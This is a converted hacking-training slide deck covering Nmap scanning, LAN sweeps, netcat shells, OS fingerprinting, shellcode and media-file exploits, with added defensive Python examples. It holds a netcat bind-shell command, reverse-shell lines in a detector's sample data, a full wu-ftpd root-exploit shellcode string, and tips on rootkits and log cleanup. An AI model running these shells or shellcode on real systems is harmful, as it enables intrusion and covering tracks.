Security & “Ethical” Hacking

By: Amanpreet Singh

Presentation #1 – Advanced Scanning & Exploitation
Introduction
   Again “Ethical” hacking

   Do you Sniff before you taste?

   Patience, persistence, some other motivational p
    word…

   Have phun, getting frustrated is normal
About Me
Overview
   Advanced scanning with NMAP (as seen
    in the Matrix)
   Local IP Sweeping & its importance
   Netcat rooting, a simple shell
   Identify Station (operating system)
   Brief Exploit talk & Shell code
   Exploits via Jpgs, Pngs, Mp3s, etc.
   Conclusion
Advanced Scanning (NMAP)
   Ok, we have acquired an IP (or a range of them) and we want to find out what is running on that system.

   We will use a very popular program named Nmap.

   Almost every Linux distribution packages it. On Windows you need to download Nmap together with its packet-capture driver (WinPcap at the time of this talk; current Windows installers bundle Npcap).
Advanced Scanning (NMAP)
   Let's look at the scan techniques Nmap provides (this list is straight from the nmap -h usage text):

SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idlescan
-sO: IP protocol scan
-b <ftp relay host>: FTP bounce scan

   On top of the port scan we will add one more option to determine the service and version in use on each open port: -sV. Strictly speaking this is not a scan technique but version detection: after the port scan, Nmap connects to each open port and matches the banner or response against its service fingerprints.
Advanced Scanning (NMAP)
   So let's run a -sV scan along with -v for verbose output and -O for OS detection: nmap -v -sV -O <target>. OS detection sends raw packets, so -O needs root (or Administrator) privileges.
Advanced Scanning (NMAP)
   The output looks like gibberish at first, but it holds VERY important details.

   First: every open port, along with the service and version running on it. Port 139 (the NetBIOS session service, which older Windows uses to carry file and printer sharing) is very interesting.

   Second: the operating system. Windows 98 SE; we will come back to that later.
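As an added example that is not part of the original slides, here is the triage the slide does by eye, automated: Nmap's grepable output (-oG) from the same -v -sV -O scan is parsed into open ports, version strings and the OS guess, which is what you feed into the exploit search later. The sample output is constructed to look like the host described above (port 139 open, OS guess Windows 98 SE); the IP, the filtered port and the banner text are made up.

```python
"""Pull the triage-relevant facts out of Nmap grepable output (-oG)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample of what `nmap -v -sV -O -oG - <target>` prints for the kind
# of host the slides describe. This is not a real capture; IP and banner are made up.
SAMPLE_GREPABLE = (
    "# Nmap scan initiated as: nmap -v -sV -O -oG - 192.168.5.23\n"
    "Host: 192.168.5.23 ()\tStatus: Up\n"
    "Host: 192.168.5.23 ()\tPorts: "
    "139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, "
    "135/filtered/tcp//msrpc///\t"
    "Ignored State: closed (998)\tOS: Microsoft Windows 98 SE\t"
    "Seq Index: 20\tIP ID Seq: Incremental\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


@dataclass
class HostReport:
    ip: str
    hostname: str
    ports: List[Port] = field(default_factory=list)
    os: Optional[str] = None


def parse_grepable(text: str) -> Dict[str, HostReport]:
    """Parse -oG output into one HostReport per IP.

    Each "Host:" line is a tab-separated list of "Key: value" fields. The Ports
    field holds comma-separated entries of the form
    port/state/proto/owner/service/rpcinfo/version/ ; Nmap replaces any '/'
    inside the version string with '|', so splitting on '/' is safe.
    """
    hosts: Dict[str, HostReport] = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        fields: Dict[str, str] = {}
        for chunk in line.split("\t"):
            key, _, value = chunk.partition(": ")
            fields[key] = value
        m = re.match(r"(\S+) \((.*)\)", fields["Host"])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        report = hosts.setdefault(ip, HostReport(ip, hostname))
        if fields.get("Ports"):
            for entry in fields["Ports"].split(", "):
                p = entry.split("/")
                report.ports.append(Port(int(p[0]), p[2], p[1], p[4], p[6]))
        if fields.get("OS"):
            report.os = fields["OS"]
    return hosts


def open_ports(report: HostReport) -> List[Port]:
    """Only 'open' matters for exploit research; filtered/closed are noise here."""
    return [p for p in report.ports if p.state == "open"]


def triage_lines(hosts: Dict[str, HostReport]) -> List[str]:
    """One line per open port, carrying the version string you will search for."""
    out = []
    for report in hosts.values():
        for p in open_ports(report):
            out.append(f"{report.ip} {p.number}/{p.proto} {p.service} "
                       f"'{p.version}' os={report.os or 'unknown'}")
    return out


if __name__ == "__main__":
    for line in triage_lines(parse_grepable(SAMPLE_GREPABLE)):
        print(line)
```

Point the parser at a real file with `nmap ... -oG scan.gnmap` and `parse_grepable(open("scan.gnmap").read())`; the version strings are exactly what you paste into a vulnerability database search.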
Protection from NMAP
   Keep your firewall up if you are not a server and not hosting anything: a host that drops unsolicited packets gives Nmap nothing to fingerprint.

   Beyond that there is not much you can do, and Nmap can be extremely stealthy using advanced techniques (slow timing, decoys, idle scans), so do not count on noticing it.

   It is scary how much information can be acquired about you by a simple scan-and-run.
Local IP Sweeping
   The LAN is generally the weakest network.

   Open ports, open boxes, free IPs, easy sweeps.

   The vast majority of people assume the other computers on their LAN are not hostile, but compromise the wireless router and bam…
Using Angry IP Scanner Again!
   Angry IP Scanner is a script-kiddie tool, but it works very well and is faster than Nmap for this job: it only does a threaded ping sweep for live hosts, not a port scan (Nmap's equivalent is -sn).

   Grab our local IP on the network and begin the scan: we are currently 192.168.5.100, so our range is 192.168.5.* (192.168.5.0/24).

   Use Angry IP Scanner just to find the live peers on the network. This is VERY useful from a compromised wireless router or a compromised system behind one.
We Have Local Victims!
   Okay, we have local victims, so we can now run Nmap against each one.

   If a host's firewall drops pings, Nmap reports it as down and skips it; the -P0 option (spelled -Pn in current versions) turns host discovery off so the port scan runs anyway. It does not bypass the firewall; it only stops Nmap from giving up on the host.

   Once we know the operating system and the open ports and versions, we can use online vulnerability databases such as www.securityfocus.com to locate exploits!
Importance of Local Sweeps
   Compromised router = compromised systems; everything that was only vulnerable from the inside is now exposed.

   Plant a full-control rootkit on one computer behind the router and you have LAN access… hence local IP sweeping.

   Worms spread within a network (commercial, government, etc.) using exactly these LAN sweeps.
Netcat Rooting (Simple Shell)
   Ok, we want to see what kind of access a shell really gives on a system.
       Shell here means a command prompt on another computer.

   Netcat is a very useful raw TCP/UDP client/server that can also double as a simple shell.

   A Windows version is free to download, and most Linux distributions ship nc already. Not every build has the -e option, though: netcat-traditional and Nmap's ncat do, the OpenBSD netcat does not.
Client/Server
   Determine which computer you want a shell on, and put nc.exe somewhere on it.

   Next run nc.exe with the following parameters:
       nc.exe -l -p 666 -e cmd.exe

   This tells Netcat to listen on TCP port 666 and, when a client connects, to run cmd.exe with its input and output wired to the socket, so the client is typing straight into the command prompt on the server. Note there is no authentication and no encryption: whoever can reach the port gets the shell, and everything typed crosses the network in plaintext.
Client Connection
   The client now connects to the server with the matching command:
           nc.exe 192.168.77.2 666

   And voilà! A Netcat shell over the network.
Why Netcat Root?
   A nice way to make your first root, and easy to expand on.

   The potential is HUGE once -e <program> is used: any program, not just cmd.exe.

   Netcat is open source, so you can read the source to understand exactly how it wires the socket to the child process.

   This also works on Unix, just replace cmd.exe with a Unix shell such as /bin/sh ;)
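The two nc.exe commands on the previous slides make a bind shell: the listener spawns the program. The mirror image, where the client side carries -e and pushes a shell out to a remote listener, is the reverse shell. As an added example that is not part of the original slides, this Python check is the defender's side of the same feature: it scans a process listing for netcat processes that execute a program and classifies each as bind or reverse. The process list is constructed; PID 412 is the slide's own command, the rest are variants the check also handles (clustered short options like -lvp, ncat's --exec and --sh-exec, an attached value like -e/bin/sh) plus harmless netcat uses and a non-netcat process as negatives. The option table is a heuristic merged from the traditional, OpenBSD and ncat variants, as the comments say.

```python
"""Flag netcat processes that hand a program's stdin/stdout to the network."""
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed process listing in `ps -eo pid,args` layout (not a real capture).
SAMPLE_PS = """\
  PID COMMAND
  412 nc.exe -l -p 666 -e cmd.exe
  977 nc -lvp 4444 -e /bin/sh
 1203 ncat --exec /bin/bash -l 5555
 1402 nc -l -p 8080
 1555 nc.exe 192.168.77.2 666
 1600 ncat --sh-exec "cmd.exe /c whoami" -lp 9000
 1650 nc 203.0.113.5 4444 -e /bin/sh
 1700 /usr/bin/python3 -m http.server 8000
"""

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "nc.traditional", "nc.openbsd"}
# Short options that consume a value (the rest of the cluster or the next token),
# merged from the traditional, OpenBSD and ncat builds. Everything else is treated
# as a boolean flag. This is a heuristic, not a full option parser for every build.
TAKES_ARG = set("pecswiqoTxXIOWMmgG")


@dataclass
class Finding:
    pid: int
    kind: str            # "bind": listener spawns the program; "reverse": client pushes it out
    port: Optional[int]
    command: str


def analyse_netcat(args: List[str]) -> Optional[dict]:
    """Return {'listen', 'port', 'exec'} for a netcat argv, or None if argv[0] is not netcat."""
    if not args:
        return None
    tool = args[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if tool not in NETCAT_NAMES:
        return None
    listen, port, execd, positional = False, None, None, []
    i = 1
    while i < len(args):
        tok = args[i]
        if tok.startswith("--"):
            name, eq, value = tok[2:].partition("=")
            if name in ("exec", "sh-exec", "lua-exec"):        # ncat long forms
                if not eq:
                    i += 1
                    value = args[i] if i < len(args) else ""
                execd = value
            elif name == "listen":
                listen = True
        elif tok.startswith("-") and len(tok) > 1:
            letters = tok[1:]
            for pos, ch in enumerate(letters):
                if ch in ("l", "L"):                             # -L is the Windows build's "listen harder"
                    listen = True
                elif ch in TAKES_ARG:
                    value = letters[pos + 1:]                    # "-e/bin/sh" style, value attached
                    if not value:                                # "-e /bin/sh" style, value is next token
                        i += 1
                        value = args[i] if i < len(args) else ""
                    if ch in ("e", "c"):
                        execd = value
                    elif ch == "p" and value.isdigit():
                        port = int(value)
                    break                                        # the value consumed the rest of the cluster
        else:
            positional.append(tok)
        i += 1
    if port is None:
        numeric = [int(p) for p in positional if p.isdigit()]
        port = numeric[-1] if numeric else None                  # "ncat -l 5555" or "nc host 4444"
    return {"listen": listen, "port": port, "exec": execd}


def find_netcat_shells(ps_text: str) -> List[Finding]:
    """Scan a pid/args listing and report every netcat that executes a program."""
    findings: List[Finding] = []
    for line in ps_text.splitlines():
        pid_s, _, cmdline = line.strip().partition(" ")
        if not pid_s.isdigit():
            continue                                             # header line or garbage
        try:
            args = shlex.split(cmdline)                          # keeps "cmd.exe /c whoami" as one token
        except ValueError:
            continue
        info = analyse_netcat(args)
        if info and info["exec"]:
            kind = "bind" if info["listen"] else "reverse"
            findings.append(Finding(int(pid_s), kind, info["port"], info["exec"]))
    return findings


if __name__ == "__main__":
    for f in find_netcat_shells(SAMPLE_PS):
        print(f"pid={f.pid} {f.kind} shell on port {f.port}: {f.command}")
```

Listening netcats without -e (PID 1402) and plain clients (PID 1555) are deliberately not flagged: they are legitimate file-transfer and port-check uses, and the thing worth alerting on is the hand-off of a process to the socket. A renamed binary defeats the name check, which is why process-name detection is a first pass, not the whole story.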
Identify Station
   A continuation of Nmap OS discovery.

   Once we have found a target, what operating system is it running?

   Nmap -O will usually tell you, unless a firewall gets in the way: OS detection needs responses from at least one open and one closed TCP port to fingerprint reliably, and a firewall that drops everything starves it of those responses.
Importance of OS ID
   Exploitation, and the choice of exploits/roots, always depends on the type of OS.

   Do we look for likely exploits, take a more aggressive approach, or leave it?
       For example, Linux servers often have an SSH server open: we can either nmap -sV it and exploit the version found, or try to brute-force logins.

   We need to know what we are trying to hack, especially when cleaning up after a successful hack (log files, email reports of floods/brute-force attempts, rootkits, etc.).
Brief Exploits & Shell Code
   Exploits come in all sorts of languages and sizes. Some you simply run once against an IP; others take various options and offsets.

   Exploits are the way of getting into a system; shellcode is what runs AFTER the exploit succeeds.

   Shellcode always varies with experienced hackers, since they keep useful shells on hand.
Example Shellcode used by WUFTPD 2.6.0 REMOTE ROOT EXPLOIT
   char linuxcode[]= /* Lam3rZ chroot() code */
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
    "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
    "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
    "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
    "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
    "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
    "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
    "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
    "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
    "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";

   This is x86 machine code for Linux, written as a C string of escaped bytes. Read as system calls it does: setreuid(0,0), dup2() to send stderr where stdout goes, mkdir() a directory, chroot() into it, chdir("..") 255 times to walk out of the FTP server's chroot jail, chroot(".") to make the escape stick, and finally execve("/bin/sh"). The trailing bytes "0bin0sh1..11" are /bin/sh with its slashes and NUL terminators patched in at run time, so the string itself contains no zero bytes.

   A transcribed byte string like this is easy to corrupt (a dropped or added byte shifts every relative jump), which is one more reason never to run shellcode you have not read.

   This is public knowledge; just type the following into Google:
        wuftpd exploit filetype:c
More on Shells Later
   Creating shellcode is an entirely different topic; how attackers work out which machine code to use and where to inject it will be covered in a later presentation.

   Shellcode is scary to look at: if you do not know the machine code or the system it is intended for, you have no way of telling what it does, and yet it can compromise a system!
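The slides above say that an unreadable blob of machine code could be doing anything. As an added example that is not part of the original presentation, the Python below takes the slide's byte string (backslashes restored) and lists the system calls it makes, by finding each `int 0x80` (bytes cd 80) and reading the `mov al, imm8` or `mov eax, imm32` that loaded the call number just before it. The bytes are handled as data only and never executed. The syscall table is the Linux i386 one; the scan is a deliberately simple heuristic, stated in the comments, that reports anything it cannot resolve instead of guessing, and it also pulls out the trailing printable string where shellcode usually keeps its paths.

```python
"""Triage unknown x86 Linux shellcode by listing the system calls it makes."""
from typing import List, Tuple

# The byte string printed on the slide (the "Lam3rZ chroot() code" from the
# wu-ftpd exploit), copied as it appears there. It is data here, never executed.
SHELLCODE = bytes.fromhex(
    "31c031db31c9b046cd8031c031db"
    "4389d941b03fcd80eb6b5e31c031"
    "c98d5e0188460466b9ffff01b027"
    "cd8031c08d5e01b03dcd8031c031"
    "db8d5e0889430231c9fec931c08d"
    "5e08b00ccd80fec975f331c08846"
    "098d5e08b03dcd80fe0eb030fec8"
    "88460431c088460789760889460c"
    "89f38d4e088d560cb00bcd8031c0"
    "31dbb001cd80e890ffffffffffff"
    "3062696e307368312e2e3131"
)

# Linux i386 system call numbers (asm/unistd_32.h) that shellcode uses most.
I386_SYSCALLS = {
    1: "exit", 3: "read", 4: "write", 5: "open", 6: "close", 11: "execve",
    12: "chdir", 23: "setuid", 39: "mkdir", 46: "setgid", 61: "chroot",
    63: "dup2", 70: "setreuid", 102: "socketcall",
}


def syscall_trace(code: bytes) -> List[Tuple[int, str]]:
    """Find every `int 0x80` (cd 80) and name the call from how eax was loaded just before it.

    This is a linear byte scan, not a disassembler: it recognises the two idioms
    `mov al, imm8` (b0 xx) and `mov eax, imm32` (b8 xx xx xx xx) directly in
    front of the interrupt. Anything else is reported as unresolved, not guessed.
    A stray 0xcd 0x80 inside another instruction's operands would be a false hit.
    """
    trace: List[Tuple[int, str]] = []
    for i in range(len(code) - 1):
        if code[i] != 0xCD or code[i + 1] != 0x80:
            continue
        if i >= 2 and code[i - 2] == 0xB0:
            nr = code[i - 1]
        elif i >= 5 and code[i - 5] == 0xB8:
            nr = int.from_bytes(code[i - 4:i], "little")
        else:
            trace.append((i, "int 0x80 (eax not loaded immediately before)"))
            continue
        trace.append((i, I386_SYSCALLS.get(nr, f"syscall {nr}")))
    return trace


def syscall_names(code: bytes) -> List[str]:
    """Just the call names, in execution order of the code's straight-line layout."""
    return [name for _, name in syscall_trace(code)]


def printable_tail(code: bytes) -> str:
    """Shellcode usually carries its strings at the end; return the trailing printable run."""
    end = len(code)
    start = end
    while start > 0 and 0x20 <= code[start - 1] <= 0x7E:
        start -= 1
    return code[start:end].decode("ascii")


if __name__ == "__main__":
    for off, name in syscall_trace(SHELLCODE):
        print(f"+0x{off:02x}  {name}")
    print("trailing string:", repr(printable_tail(SHELLCODE)))
```

The trace is setreuid, dup2, mkdir, chroot, chdir, chroot, execve, exit, with `0bin0sh1..11` at the tail: the chroot-break-then-/bin/sh pattern, readable without running a single byte. The scan says nothing about loops or jumps (the chdir appears once although it runs in a loop), so a disassembler is still the next step before trusting the result.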
Exploits via Jpg, Pngs, Mp3s
   Exploits come in many varieties; a stray string call or a bad size check is all it takes to make a program vulnerable.

   All sorts of file formats have been vulnerable. The famous GDI+ JPEG vulnerability (MS04-028, September 2004) executed code just by viewing a JPEG!
GDI+ Jpg vulnerability
Posted on Sept. 30, 2004
 “In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads the viewing user's computer is then infected.

  Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers at the time of this writing.”
Exploits via Jpg, Pngs, Mp3s
   Other vulnerabilities in the form of PNGs and MP3s have turned up in the wild.

   One MP3 used a malformed header so that Winamp ran shellcode when it parsed the file's metadata.

   A PNG exploit in MSN Messenger (the PNG-processing bug fixed by MS05-009) let an attacker put shellcode in a PNG and display it to other users as a buddy icon.
Just because its media…
   Just because you are viewing a jpg, png, mp3 or wmv, you could still be running something that exploits your computer: the parser for the file is code, and it does whatever the file's headers steer it into doing.

   Many people think exploits come only in limited forms (scripts, TCP/UDP injection, executables), but there are many ways in.
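The GDI+ bug is a concrete instance of the "bad size check" this section keeps coming back to: a JPEG marker segment's two-byte length field counts itself, and GDI+ subtracted 2 from it without checking it was at least 2, so a declared length of 0 or 1 wrapped around to a huge copy size. As an added example, not from the original slides, the Python below shows that arithmetic next to a marker-segment walker that rejects it, run over constructed byte strings (a minimal JFIF header with a comment, the same with a COM length of 1, and a truncated file); the sample files are made up, not real images, and the walker stops at the scan header because everything after it is entropy-coded data rather than length-prefixed segments.

```python
"""Walk JPEG marker segments and reject the malformed lengths media parsers have tripped on."""
from typing import List, Tuple

APP0, COM, SOI, EOI, SOS = 0xE0, 0xFE, 0xD8, 0xD9, 0xDA


def segment(marker: int, payload: bytes) -> bytes:
    """Build one marker segment; per the JPEG spec the 2-byte length counts itself."""
    return bytes([0xFF, marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed inputs, not real images. BENIGN is a minimal JFIF header plus a
# comment; MALICIOUS declares a COM length of 1, below the 2 bytes the length
# field itself occupies (the MS04-028 shape); TRUNCATED claims more payload than
# the file holds.
BENIGN = (b"\xff\xd8"
          + segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
          + segment(COM, b"hello!")
          + b"\xff\xd9")
MALICIOUS = b"\xff\xd8" + b"\xff\xfe\x00\x01" + b"A" * 16 + b"\xff\xd9"
TRUNCATED = b"\xff\xd8" + b"\xff\xfe\x00\x40" + b"short"


def vulnerable_payload_length(declared: int) -> int:
    """The buggy arithmetic: payload = declared - 2 in unsigned 32-bit math, with no
    check that declared >= 2. A declared length of 0 or 1 wraps to about 4 GiB,
    which then drives a heap copy far past the buffer."""
    return (declared - 2) & 0xFFFFFFFF


def walk_segments(data: bytes) -> List[Tuple[int, bytes]]:
    """Return (marker, payload) for every header segment up to SOS/EOI.

    Raises ValueError on anything malformed instead of trusting the file."""
    if data[:2] != bytes([0xFF, SOI]):
        raise ValueError("missing SOI")
    segs: List[Tuple[int, bytes]] = []
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        while pos < len(data) and data[pos] == 0xFF:        # 0xFF fill bytes are legal before a marker
            pos += 1
        if pos >= len(data):
            raise ValueError("truncated marker")
        marker = data[pos]
        pos += 1
        if marker in (EOI, SOS):                             # entropy-coded data follows SOS; headers end
            segs.append((marker, b""))
            return segs
        if 0xD0 <= marker <= 0xD7 or marker == 0x01:         # RSTn / TEM carry no length field
            segs.append((marker, b""))
            continue
        if pos + 2 > len(data):
            raise ValueError("truncated length field")
        declared = int.from_bytes(data[pos:pos + 2], "big")
        if declared < 2:                                     # the check GDI+ was missing
            raise ValueError(f"segment 0xFF{marker:02X} declared length {declared} < 2 (the MS04-028 pattern)")
        if pos + declared > len(data):
            raise ValueError(f"segment 0xFF{marker:02X} length {declared} runs past end of file")
        segs.append((marker, data[pos + 2:pos + declared]))
        pos += declared
    raise ValueError("no SOS or EOI before end of data")


def check_jpeg(data: bytes) -> Tuple[bool, str]:
    """Accept/reject wrapper: (True, 'E0,FE,D9') or (False, reason)."""
    try:
        return True, ",".join(f"{m:02X}" for m, _ in walk_segments(data))
    except ValueError as err:
        return False, str(err)


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("malicious", MALICIOUS), ("truncated", TRUNCATED)):
        print(name, check_jpeg(blob))
    print("buggy payload length for declared=1:", hex(vulnerable_payload_length(1)))
```

Both bounds matter: the lower bound (declared >= 2) is the integer underflow, and the upper bound (segment fits in the file) is the plain over-read. A parser that only checks one of them is still exploitable by a file that fails the other.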
Resources
   If this type of information interests you, there are many safe online resources.

   www.hackthissite.org - a friendly playground for web hackers

   www.phrack.org - a very good place for random articles with great pieces of info

   www.securityfocus.com - some of the best up-to-date info about vulnerabilities and exploits at the time of this talk (the SecurityFocus database and the Bugtraq list have since been shut down; NVD and Exploit-DB fill that role today).
Conclusion
   Again, I emphasize: just because I am showing you this does NOT make it legal.
       In fact, scanning government systems with Nmap and getting caught can land you fines and possible jail time. Running exploits with shellcode you do not trust could expose your test system to a virus or backdoor you do not know about.

   Remember, finding exploits that work is tedious; not everything you find online works every time. Set up a fun box (something like Mandrake) and install some vulnerable software on it. See if you can break into it, e.g. wu-ftpd 2.6.0. Have fun; it takes work, so don't give up!
Thank You For Your Time!

   Feel free to email me any questions/comments at Er.dehaljatt@gmail.com
